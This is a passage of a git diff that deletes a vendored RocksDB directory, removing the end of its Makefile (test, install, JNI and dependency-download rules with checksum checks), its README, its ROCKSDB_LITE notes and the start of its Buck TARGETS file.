-compact_files_test: db/compact_files_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_test: options/options_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_settable_test: options/options_settable_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_util_test: utilities/options/options_util_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_bench_tool_test: tools/db_bench_tool_test.o $(BENCHTOOLOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-event_logger_test: util/event_logger_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-timer_queue_test: util/timer_queue_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-sst_dump_test: tools/sst_dump_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-column_aware_encoding_test: utilities/column_aware_encoding_test.o $(TESTHARNESS) $(EXPOBJECTS)
-	$(AM_LINK)
-
-optimistic_transaction_test: utilities/transactions/optimistic_transaction_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-mock_env_test : env/mock_env_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-manual_compaction_test: db/manual_compaction_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-filelock_test: util/filelock_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-auto_roll_logger_test: util/auto_roll_logger_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-memtable_list_test: db/memtable_list_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_callback_test: db/write_callback_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-heap_test: util/heap_test.o $(GTEST)
-	$(AM_LINK)
-
-transaction_test: utilities/transactions/transaction_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-sst_dump: tools/sst_dump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-blob_dump: tools/blob_dump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-column_aware_encoding_exp: utilities/column_aware_encoding_exp.o $(EXPOBJECTS)
-	$(AM_LINK)
-
-repair_test: db/repair_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ldb_cmd_test: tools/ldb_cmd_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ldb: tools/ldb.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-iostats_context_test: monitoring/iostats_context_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS)
-
-persistent_cache_test: utilities/persistent_cache/persistent_cache_test.o  db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-statistics_test: monitoring/statistics_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-lru_cache_test: cache/lru_cache_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-lua_test: utilities/lua/rocks_lua_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-range_del_aggregator_test: db/range_del_aggregator_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-blob_db_test: utilities/blob_db/blob_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-#-------------------------------------------------
-# make install related stuff
-INSTALL_PATH ?= /usr/local
-
-uninstall:
-	rm -rf $(INSTALL_PATH)/include/rocksdb \
-	  $(INSTALL_PATH)/lib/$(LIBRARY) \
-	  $(INSTALL_PATH)/lib/$(SHARED4) \
-	  $(INSTALL_PATH)/lib/$(SHARED3) \
-	  $(INSTALL_PATH)/lib/$(SHARED2) \
-	  $(INSTALL_PATH)/lib/$(SHARED1)
-
-install-headers:
-	install -d $(INSTALL_PATH)/lib
-	for header_dir in `find "include/rocksdb" -type d`; do \
-		install -d $(INSTALL_PATH)/$$header_dir; \
-	done
-	for header in `find "include/rocksdb" -type f -name *.h`; do \
-		install -C -m 644 $$header $(INSTALL_PATH)/$$header; \
-	done
-
-install-static: install-headers $(LIBRARY)
-	install -C -m 755 $(LIBRARY) $(INSTALL_PATH)/lib
-
-install-shared: install-headers $(SHARED4)
-	install -C -m 755 $(SHARED4) $(INSTALL_PATH)/lib && \
-		ln -fs $(SHARED4) $(INSTALL_PATH)/lib/$(SHARED3) && \
-		ln -fs $(SHARED4) $(INSTALL_PATH)/lib/$(SHARED2) && \
-		ln -fs $(SHARED4) $(INSTALL_PATH)/lib/$(SHARED1)
-
-# install static by default + install shared if it exists
-install: install-static
-	[ -e $(SHARED4) ] && $(MAKE) install-shared || :
-
-#-------------------------------------------------
-
-
-# ---------------------------------------------------------------------------
-# Jni stuff
-# ---------------------------------------------------------------------------
-
-JAVA_INCLUDE = -I$(JAVA_HOME)/include/ -I$(JAVA_HOME)/include/linux
-ifeq ($(PLATFORM), OS_SOLARIS)
-	ARCH := $(shell isainfo -b)
-else
-	ARCH := $(shell getconf LONG_BIT)
-endif
-
-ifeq (,$(findstring ppc,$(MACHINE)))
-        ROCKSDBJNILIB = librocksdbjni-linux$(ARCH).so
-else
-        ROCKSDBJNILIB = librocksdbjni-linux-$(MACHINE).so
-endif
-ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux$(ARCH).jar
-ROCKSDB_JAR_ALL = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar
-ROCKSDB_JAVADOCS_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-javadoc.jar
-ROCKSDB_SOURCES_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-sources.jar
-SHA256_CMD = sha256sum
-
-ZLIB_VER ?= 1.2.11
-ZLIB_SHA256 ?= c3e5e9fdd5004dcb542feda5ee4f0ff0744628baf8ed2dd5d66f8ca1197cb1a1
-ZLIB_DOWNLOAD_BASE ?= http://zlib.net
-BZIP2_VER ?= 1.0.6
-BZIP2_SHA256 ?= a2848f34fcd5d6cf47def00461fcb528a0484d8edef8208d6d2e2909dc61d9cd
-BZIP2_DOWNLOAD_BASE ?= http://www.bzip.org
-SNAPPY_VER ?= 1.1.4
-SNAPPY_SHA256 ?= 134bfe122fd25599bb807bb8130e7ba6d9bdb851e0b16efcb83ac4f5d0b70057
-SNAPPY_DOWNLOAD_BASE ?= https://github.com/google/snappy/releases/download
-LZ4_VER ?= 1.7.5
-LZ4_SHA256 ?= 0190cacd63022ccb86f44fa5041dc6c3804407ad61550ca21c382827319e7e7e
-LZ4_DOWNLOAD_BASE ?= https://github.com/lz4/lz4/archive
-ZSTD_VER ?= 1.2.0
-ZSTD_SHA256 ?= 4a7e4593a3638276ca7f2a09dc4f38e674d8317bbea51626393ca73fc047cbfb
-ZSTD_DOWNLOAD_BASE ?= https://github.com/facebook/zstd/archive
-
-ifeq ($(PLATFORM), OS_MACOSX)
-	ROCKSDBJNILIB = librocksdbjni-osx.jnilib
-	ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-osx.jar
-	SHA256_CMD = openssl sha256 -r
-ifneq ("$(wildcard $(JAVA_HOME)/include/darwin)","")
-	JAVA_INCLUDE = -I$(JAVA_HOME)/include -I $(JAVA_HOME)/include/darwin
-else
-	JAVA_INCLUDE = -I/System/Library/Frameworks/JavaVM.framework/Headers/
-endif
-endif
-ifeq ($(PLATFORM), OS_FREEBSD)
-	JAVA_INCLUDE += -I$(JAVA_HOME)/include/freebsd
-	ROCKSDBJNILIB = librocksdbjni-freebsd$(ARCH).so
-	ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-freebsd$(ARCH).jar
-endif
-ifeq ($(PLATFORM), OS_SOLARIS)
-	ROCKSDBJNILIB = librocksdbjni-solaris$(ARCH).so
-	ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-solaris$(ARCH).jar
-	JAVA_INCLUDE = -I$(JAVA_HOME)/include/ -I$(JAVA_HOME)/include/solaris
-	SHA256_CMD = digest -a sha256
-endif
-ifeq ($(PLATFORM), OS_AIX)
-	JAVA_INCLUDE = -I$(JAVA_HOME)/include/ -I$(JAVA_HOME)/include/aix
-	ROCKSDBJNILIB = librocksdbjni-aix.so
-	EXTRACT_SOURCES = gunzip < TAR_GZ | tar xvf -
-	SNAPPY_MAKE_TARGET = libsnappy.la
-endif
-
-libz.a:
-	-rm -rf zlib-$(ZLIB_VER)
-	curl -O -L ${ZLIB_DOWNLOAD_BASE}/zlib-$(ZLIB_VER).tar.gz
-	ZLIB_SHA256_ACTUAL=`$(SHA256_CMD) zlib-$(ZLIB_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(ZLIB_SHA256)" != "$$ZLIB_SHA256_ACTUAL" ]; then \
-		echo zlib-$(ZLIB_VER).tar.gz checksum mismatch, expected=\"$(ZLIB_SHA256)\" actual=\"$$ZLIB_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf zlib-$(ZLIB_VER).tar.gz
-	cd zlib-$(ZLIB_VER) && CFLAGS='-fPIC ${EXTRA_CFLAGS}' LDFLAGS='${EXTRA_LDFLAGS}' ./configure --static && make
-	cp zlib-$(ZLIB_VER)/libz.a .
-
-libbz2.a:
-	-rm -rf bzip2-$(BZIP2_VER)
-	curl -O -L ${BZIP2_DOWNLOAD_BASE}/$(BZIP2_VER)/bzip2-$(BZIP2_VER).tar.gz
-	BZIP2_SHA256_ACTUAL=`$(SHA256_CMD) bzip2-$(BZIP2_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(BZIP2_SHA256)" != "$$BZIP2_SHA256_ACTUAL" ]; then \
-		echo bzip2-$(BZIP2_VER).tar.gz checksum mismatch, expected=\"$(BZIP2_SHA256)\" actual=\"$$BZIP2_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf bzip2-$(BZIP2_VER).tar.gz
-	cd bzip2-$(BZIP2_VER) && make CFLAGS='-fPIC -O2 -g -D_FILE_OFFSET_BITS=64 ${EXTRA_CFLAGS}' AR='ar ${EXTRA_ARFLAGS}'
-	cp bzip2-$(BZIP2_VER)/libbz2.a .
-
-libsnappy.a:
-	-rm -rf snappy-$(SNAPPY_VER)
-	curl -O -L ${SNAPPY_DOWNLOAD_BASE}/$(SNAPPY_VER)/snappy-$(SNAPPY_VER).tar.gz
-	SNAPPY_SHA256_ACTUAL=`$(SHA256_CMD) snappy-$(SNAPPY_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(SNAPPY_SHA256)" != "$$SNAPPY_SHA256_ACTUAL" ]; then \
-		echo snappy-$(SNAPPY_VER).tar.gz checksum mismatch, expected=\"$(SNAPPY_SHA256)\" actual=\"$$SNAPPY_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf snappy-$(SNAPPY_VER).tar.gz
-	cd snappy-$(SNAPPY_VER) && CFLAGS='${EXTRA_CFLAGS}' CXXFLAGS='${EXTRA_CXXFLAGS}' LDFLAGS='${EXTRA_LDFLAGS}' ./configure --with-pic --enable-static --disable-shared
-	cd snappy-$(SNAPPY_VER) && make ${SNAPPY_MAKE_TARGET}
-	cp snappy-$(SNAPPY_VER)/.libs/libsnappy.a .
-
-liblz4.a:
-	-rm -rf lz4-$(LZ4_VER)
-	curl -O -L ${LZ4_DOWNLOAD_BASE}/v$(LZ4_VER).tar.gz
-	mv v$(LZ4_VER).tar.gz lz4-$(LZ4_VER).tar.gz
-	LZ4_SHA256_ACTUAL=`$(SHA256_CMD) lz4-$(LZ4_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(LZ4_SHA256)" != "$$LZ4_SHA256_ACTUAL" ]; then \
-		echo lz4-$(LZ4_VER).tar.gz checksum mismatch, expected=\"$(LZ4_SHA256)\" actual=\"$$LZ4_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf lz4-$(LZ4_VER).tar.gz
-	cd lz4-$(LZ4_VER)/lib && make CFLAGS='-fPIC -O2 ${EXTRA_CFLAGS}' all
-	cp lz4-$(LZ4_VER)/lib/liblz4.a .
-
-libzstd.a:
-	-rm -rf zstd-$(ZSTD_VER)
-	curl -O -L ${ZSTD_DOWNLOAD_BASE}/v$(ZSTD_VER).tar.gz
-	mv v$(ZSTD_VER).tar.gz zstd-$(ZSTD_VER).tar.gz
-	ZSTD_SHA256_ACTUAL=`$(SHA256_CMD) zstd-$(ZSTD_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(ZSTD_SHA256)" != "$$ZSTD_SHA256_ACTUAL" ]; then \
-		echo zstd-$(ZSTD_VER).tar.gz checksum mismatch, expected=\"$(ZSTD_SHA256)\" actual=\"$$ZSTD_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf zstd-$(ZSTD_VER).tar.gz
-	cd zstd-$(ZSTD_VER)/lib && make CFLAGS='-fPIC -O2 ${EXTRA_CFLAGS}' all
-	cp zstd-$(ZSTD_VER)/lib/libzstd.a .
-
-# A version of each $(LIBOBJECTS) compiled with -fPIC and a fixed set of static compression libraries
-java_static_libobjects = $(patsubst %,jls/%,$(LIBOBJECTS))
-CLEAN_FILES += jls
-
-ifneq ($(ROCKSDB_JAVA_NO_COMPRESSION), 1)
-JAVA_COMPRESSIONS = libz.a libbz2.a libsnappy.a liblz4.a libzstd.a
-endif
-
-JAVA_STATIC_FLAGS = -DZLIB -DBZIP2 -DSNAPPY -DLZ4 -DZSTD
-JAVA_STATIC_INCLUDES = -I./zlib-$(ZLIB_VER) -I./bzip2-$(BZIP2_VER) -I./snappy-$(SNAPPY_VER) -I./lz4-$(LZ4_VER)/lib -I./zstd-$(ZSTD_VER)/lib
-
-$(java_static_libobjects): jls/%.o: %.cc $(JAVA_COMPRESSIONS)
-	$(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(JAVA_STATIC_FLAGS) $(JAVA_STATIC_INCLUDES) -fPIC -c $< -o $@ $(COVERAGEFLAGS)
-
-rocksdbjavastatic: $(java_static_libobjects)
-	cd java;$(MAKE) javalib;
-	rm -f ./java/target/$(ROCKSDBJNILIB)
-	$(CXX) $(CXXFLAGS) -I./java/. $(JAVA_INCLUDE) -shared -fPIC \
-	  -o ./java/target/$(ROCKSDBJNILIB) $(JNI_NATIVE_SOURCES) \
-	  $(java_static_libobjects) $(COVERAGEFLAGS) \
-	  $(JAVA_COMPRESSIONS) $(JAVA_STATIC_LDFLAGS)
-	cd java/target;strip $(STRIPFLAGS) $(ROCKSDBJNILIB)
-	cd java;jar -cf target/$(ROCKSDB_JAR) HISTORY*.md
-	cd java/target;jar -uf $(ROCKSDB_JAR) $(ROCKSDBJNILIB)
-	cd java/target/classes;jar -uf ../$(ROCKSDB_JAR) org/rocksdb/*.class org/rocksdb/util/*.class
-	cd java/target/apidocs;jar -cf ../$(ROCKSDB_JAVADOCS_JAR) *
-	cd java/src/main/java;jar -cf ../../../target/$(ROCKSDB_SOURCES_JAR) org
-
-rocksdbjavastaticrelease: rocksdbjavastatic
-	cd java/crossbuild && vagrant destroy -f && vagrant up linux32 && vagrant halt linux32 && vagrant up linux64 && vagrant halt linux64
-	cd java;jar -cf target/$(ROCKSDB_JAR_ALL) HISTORY*.md
-	cd java/target;jar -uf $(ROCKSDB_JAR_ALL) librocksdbjni-*.so librocksdbjni-*.jnilib
-	cd java/target/classes;jar -uf ../$(ROCKSDB_JAR_ALL) org/rocksdb/*.class org/rocksdb/util/*.class
-
-rocksdbjavastaticreleasedocker: rocksdbjavastatic
-	DOCKER_LINUX_X64_CONTAINER=`docker ps -aqf name=rocksdb_linux_x64-be`; \
-	if [ -z "$$DOCKER_LINUX_X64_CONTAINER" ]; then \
-		docker container create --attach stdin --attach stdout --attach stderr --volume `pwd`:/rocksdb-host --name rocksdb_linux_x64-be evolvedbinary/rocksjava:centos6_x64-be /rocksdb-host/java/crossbuild/docker-build-linux-centos.sh; \
-	fi
-	docker start -a rocksdb_linux_x64-be
-	DOCKER_LINUX_X86_CONTAINER=`docker ps -aqf name=rocksdb_linux_x86-be`; \
-	if [ -z "$$DOCKER_LINUX_X86_CONTAINER" ]; then \
-		docker container create --attach stdin --attach stdout --attach stderr --volume `pwd`:/rocksdb-host --name rocksdb_linux_x86-be evolvedbinary/rocksjava:centos6_x86-be /rocksdb-host/java/crossbuild/docker-build-linux-centos.sh; \
-	fi
-	docker start -a rocksdb_linux_x86-be
-	cd java;jar -cf target/$(ROCKSDB_JAR_ALL) HISTORY*.md
-	cd java/target;jar -uf $(ROCKSDB_JAR_ALL) librocksdbjni-*.so librocksdbjni-*.jnilib
-	cd java/target/classes;jar -uf ../$(ROCKSDB_JAR_ALL) org/rocksdb/*.class org/rocksdb/util/*.class
-
-rocksdbjavastaticpublish: rocksdbjavastaticrelease rocksdbjavastaticpublishcentral
-
-rocksdbjavastaticpublishdocker: rocksdbjavastaticreleasedocker rocksdbjavastaticpublishcentral
-
-rocksdbjavastaticpublishcentral:
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-javadoc.jar -Dclassifier=javadoc
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-sources.jar -Dclassifier=sources
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux64.jar -Dclassifier=linux64
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux32.jar -Dclassifier=linux32
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-osx.jar -Dclassifier=osx
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-win64.jar -Dclassifier=win64
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar
-
-# A version of each $(LIBOBJECTS) compiled with -fPIC
-java_libobjects = $(patsubst %,jl/%,$(LIBOBJECTS))
-CLEAN_FILES += jl
-
-$(java_libobjects): jl/%.o: %.cc
-	$(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS)
-
-rocksdbjava: $(java_libobjects)
-	$(AM_V_GEN)cd java;$(MAKE) javalib;
-	$(AM_V_at)rm -f ./java/target/$(ROCKSDBJNILIB)
-	$(AM_V_at)$(CXX) $(CXXFLAGS) -I./java/. $(JAVA_INCLUDE) -shared -fPIC -o ./java/target/$(ROCKSDBJNILIB) $(JNI_NATIVE_SOURCES) $(java_libobjects) $(JAVA_LDFLAGS) $(COVERAGEFLAGS)
-	$(AM_V_at)cd java;jar -cf target/$(ROCKSDB_JAR) HISTORY*.md
-	$(AM_V_at)cd java/target;jar -uf $(ROCKSDB_JAR) $(ROCKSDBJNILIB)
-	$(AM_V_at)cd java/target/classes;jar -uf ../$(ROCKSDB_JAR) org/rocksdb/*.class org/rocksdb/util/*.class
-
-jclean:
-	cd java;$(MAKE) clean;
-
-jtest_compile: rocksdbjava
-	cd java;$(MAKE) java_test
-
-jtest_run:
-	cd java;$(MAKE) run_test
-
-jtest: rocksdbjava
-	cd java;$(MAKE) sample;$(MAKE) test;
-
-jdb_bench:
-	cd java;$(MAKE) db_bench;
-
-commit_prereq: build_tools/rocksdb-lego-determinator \
-               build_tools/precommit_checker.py
-	J=$(J) build_tools/precommit_checker.py unit unit_481 clang_unit release release_481 clang_release tsan asan ubsan lite unit_non_shm
-	$(MAKE) clean && $(MAKE) jclean && $(MAKE) rocksdbjava;
-
-# ---------------------------------------------------------------------------
-#  	Platform-specific compilation
-# ---------------------------------------------------------------------------
-
-ifeq ($(PLATFORM), IOS)
-# For iOS, create universal object files to be used on both the simulator and
-# a device.
-PLATFORMSROOT=/Applications/Xcode.app/Contents/Developer/Platforms
-SIMULATORROOT=$(PLATFORMSROOT)/iPhoneSimulator.platform/Developer
-DEVICEROOT=$(PLATFORMSROOT)/iPhoneOS.platform/Developer
-IOSVERSION=$(shell defaults read $(PLATFORMSROOT)/iPhoneOS.platform/version CFBundleShortVersionString)
-
-.cc.o:
-	mkdir -p ios-x86/$(dir $@)
-	$(CXX) $(CXXFLAGS) -isysroot $(SIMULATORROOT)/SDKs/iPhoneSimulator$(IOSVERSION).sdk -arch i686 -arch x86_64 -c $< -o ios-x86/$@
-	mkdir -p ios-arm/$(dir $@)
-	xcrun -sdk iphoneos $(CXX) $(CXXFLAGS) -isysroot $(DEVICEROOT)/SDKs/iPhoneOS$(IOSVERSION).sdk -arch armv6 -arch armv7 -arch armv7s -arch arm64 -c $< -o ios-arm/$@
-	lipo ios-x86/$@ ios-arm/$@ -create -output $@
-
-.c.o:
-	mkdir -p ios-x86/$(dir $@)
-	$(CC) $(CFLAGS) -isysroot $(SIMULATORROOT)/SDKs/iPhoneSimulator$(IOSVERSION).sdk -arch i686 -arch x86_64 -c $< -o ios-x86/$@
-	mkdir -p ios-arm/$(dir $@)
-	xcrun -sdk iphoneos $(CC) $(CFLAGS) -isysroot $(DEVICEROOT)/SDKs/iPhoneOS$(IOSVERSION).sdk -arch armv6 -arch armv7 -arch armv7s -arch arm64 -c $< -o ios-arm/$@
-	lipo ios-x86/$@ ios-arm/$@ -create -output $@
-
-else
-.cc.o:
-	$(AM_V_CC)$(CXX) $(CXXFLAGS) -c $< -o $@ $(COVERAGEFLAGS)
-
-.c.o:
-	$(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@
-endif
-
-# ---------------------------------------------------------------------------
-#  	Source files dependencies detection
-# ---------------------------------------------------------------------------
-
-all_sources = $(LIB_SOURCES) $(MAIN_SOURCES) $(MOCK_LIB_SOURCES) $(TOOL_LIB_SOURCES) $(BENCH_LIB_SOURCES) $(TEST_LIB_SOURCES) $(EXP_LIB_SOURCES)
-DEPFILES = $(all_sources:.cc=.d)
-
-# Add proper dependency support so changing a .h file forces a .cc file to
-# rebuild.
-
-# The .d file indicates .cc file's dependencies on .h files. We generate such
-# dependency by g++'s -MM option, whose output is a make dependency rule.
-$(DEPFILES): %.d: %.cc
-	@$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \
-	  -MM -MT'$@' -MT'$(<:.cc=.o)' "$<" -o '$@'
-
-depend: $(DEPFILES)
-
-# if the make goal is either "clean" or "format", we shouldn't
-# try to import the *.d files.
-# TODO(kailiu) The unfamiliarity of Make's conditions leads to the ugly
-# working solution.
-ifneq ($(MAKECMDGOALS),clean)
-ifneq ($(MAKECMDGOALS),format)
-ifneq ($(MAKECMDGOALS),jclean)
-ifneq ($(MAKECMDGOALS),jtest)
-ifneq ($(MAKECMDGOALS),package)
-ifneq ($(MAKECMDGOALS),analyze)
--include $(DEPFILES)
-endif
-endif
-endif
-endif
-endif
-endif
diff --git a/thirdparty/rocksdb/README.md b/thirdparty/rocksdb/README.md
deleted file mode 100644
index 550c352..0000000
--- a/thirdparty/rocksdb/README.md
+++ /dev/null
@@ -1,27 +0,0 @@
-## RocksDB: A Persistent Key-Value Store for Flash and RAM Storage
-
-[![Build Status](https://travis-ci.org/facebook/rocksdb.svg?branch=master)](https://travis-ci.org/facebook/rocksdb)
-[![Build status](https://ci.appveyor.com/api/projects/status/fbgfu0so3afcno78/branch/master?svg=true)](https://ci.appveyor.com/project/Facebook/rocksdb/branch/master)
-
-
-RocksDB is developed and maintained by Facebook Database Engineering Team.
-It is built on earlier work on LevelDB by Sanjay Ghemawat (sanjay@google.com)
-and Jeff Dean (jeff@google.com)
-
-This code is a library that forms the core building block for a fast
-key value server, especially suited for storing data on flash drives.
-It has a Log-Structured-Merge-Database (LSM) design with flexible tradeoffs
-between Write-Amplification-Factor (WAF), Read-Amplification-Factor (RAF)
-and Space-Amplification-Factor (SAF). It has multi-threaded compactions,
-making it specially suitable for storing multiple terabytes of data in a
-single database.
-
-Start with example usage here: https://github.com/facebook/rocksdb/tree/master/examples
-
-See the [github wiki](https://github.com/facebook/rocksdb/wiki) for more explanation.
-
-The public interface is in `include/`.  Callers should not include or
-rely on the details of any other header files in this package.  Those
-internal APIs may be changed without warning.
-
-Design discussions are conducted in https://www.facebook.com/groups/rocksdb.dev/
diff --git a/thirdparty/rocksdb/ROCKSDB_LITE.md b/thirdparty/rocksdb/ROCKSDB_LITE.md
deleted file mode 100644
index 41cfbec..0000000
--- a/thirdparty/rocksdb/ROCKSDB_LITE.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# RocksDBLite
-
-RocksDBLite is a project focused on mobile use cases, which don't need a lot of fancy things we've built for server workloads and they are very sensitive to binary size. For that reason, we added a compile flag ROCKSDB_LITE that comments out a lot of the nonessential code and keeps the binary lean.
-
-Some examples of the features disabled by ROCKSDB_LITE:
-* compiled-in support for LDB tool
-* No backupable DB
-* No support for replication (which we provide in form of TrasactionalIterator)
-* No advanced monitoring tools
-* No special-purpose memtables that are highly optimized for specific use cases
-* No Transactions
-
-When adding a new big feature to RocksDB, please add ROCKSDB_LITE compile guard if:
-* Nobody from mobile really needs your feature,
-* Your feature is adding a lot of weight to the binary.
-
-Don't add ROCKSDB_LITE compile guard if:
-* It would introduce a lot of code complexity. Compile guards make code harder to read. It's a trade-off.
-* Your feature is not adding a lot of weight.
-
-If unsure, ask. :)
diff --git a/thirdparty/rocksdb/TARGETS b/thirdparty/rocksdb/TARGETS
deleted file mode 100644
index ac85eab..0000000
--- a/thirdparty/rocksdb/TARGETS
+++ /dev/null
@@ -1,534 +0,0 @@
-
-import os
-
-TARGETS_PATH = os.path.dirname(__file__)
-REPO_PATH = TARGETS_PATH[(TARGETS_PATH.find('fbcode/') + len('fbcode/')):] + "/"
-BUCK_BINS = "buck-out/gen/" + REPO_PATH
-TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh"
-rocksdb_compiler_flags = [
-  "-fno-builtin-memcmp",
-  "-DROCKSDB_PLATFORM_POSIX",
-  "-DROCKSDB_LIB_IO_POSIX",
-  "-DROCKSDB_FALLOCATE_PRESENT",
-  "-DROCKSDB_MALLOC_USABLE_SIZE",
-  "-DROCKSDB_RANGESYNC_PRESENT",
-  "-DROCKSDB_SCHED_GETCPU_PRESENT",
-  "-DROCKSDB_SUPPORT_THREAD_LOCAL",
-  "-DOS_LINUX",
-  "-DROCKSDB_UBSAN_RUN",
-  # Flags to enable libs we include
-  "-DSNAPPY",
-  "-DZLIB",
-  "-DBZIP2",
-  "-DLZ4",
-  "-DZSTD",
-  "-DGFLAGS=gflags",
-  "-DNUMA",
-  "-DTBB",
-  # Needed to compile in fbcode
-  "-Wno-expansion-to-defined",
-]
-
-rocksdb_external_deps = [
-  ('bzip2', None, 'bz2'),
-  ('snappy', None, "snappy"),
-  ('zlib', None, 'z'),
-  ('gflags', None, 'gflags'),
-  ('lz4', None, 'lz4'),
-  ('zstd', None),
-  ('tbb', None),
-  ("numa", None, "numa"),
-  ("googletest", None, "gtest"),
-]
-
-rocksdb_preprocessor_flags = [
-  # Directories with files for #include
-  "-I" + REPO_PATH + "include/",
-  "-I" + REPO_PATH,
-]
-
-rocksdb_arch_preprocessor_flags = {
-  "x86_64": ["-DHAVE_SSE42"],
-}
-
-cpp_library(
-    name = "rocksdb_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = [
-      "cache/clock_cache.cc",
-      "cache/lru_cache.cc",
-      "cache/sharded_cache.cc",
-      "db/builder.cc",
-      "db/c.cc",
-      "db/column_family.cc",
-      "db/compacted_db_impl.cc",
-      "db/compaction.cc",
